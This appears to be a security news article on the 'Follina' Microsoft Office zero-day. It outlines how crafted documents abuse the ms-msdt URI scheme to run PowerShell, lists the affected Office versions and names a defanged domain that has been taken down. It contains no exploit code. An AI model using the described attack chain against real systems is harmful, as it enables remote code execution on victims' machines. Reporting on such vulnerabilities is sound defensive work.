Security researchers have recently discovered a new zero-day vulnerability in Microsoft Office, resulting in the execution of code when exploited.
It is possible to exploit this issue by exploiting maldocs (maliciously crafted documents), which load HTML code after they are opened. Following that, it executes the PowerShell code by using a Microsoft Office Uniform Resource Identifier (URI) scheme known as ms-msdt.
Unexpected Detection of Microsoft Office zero-day
Although this zero-day vulnerability was discovered initially by a researcher, who goes by the Twitter handle of “nao_sec” on the platform.
The vulnerability has not been assigned a tracking number yet, and it is simply known as Follina in the infosec industry. Through MSDT, essentially, the exploit leverages the maliciously crafted Word documents to run the PowerShell commands.
In order to extract Base64 encoded files from a RAR file, the script will extract a PowerShell script. It is unclear what malicious activity has been carried out by the attackers, due to the lack of availability of this file.
As a result of the Protected View feature in Microsoft Office, which is designed to provide users with alerts about possibly unsafe locations, the feature is also able to alert users that potentially malicious documents may exist on their computers.
Zero-day in Action
The malicious document shared by nao_sec has been analyzed by a number of researchers in the field of security. There are several reports of multiple versions of Microsoft Office being exploited successfully with all of them.
This vulnerability exists in the following version of Microsoft Office:-
- Microsoft Office 2013
- Microsoft Office 2016
- Microsoft Office Pro Plus
- Microsoft Office 2021
This experiment was triggered by an HTML document from a domain called “xmlformats[.]com” that is no longer available. The payload can be delivered to zero-click exploiters in the form of an RTF document without the user being required to interact with it.
Moreover, the above-mentioned domain was hosted by a company named Namecheap, which was notified of the abuse and immediately deleted the domain.
There is currently no clear indication of how Microsoft will proceed in response to the discovery and how quickly it will release a patch in response.
You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity and hacking news updates.
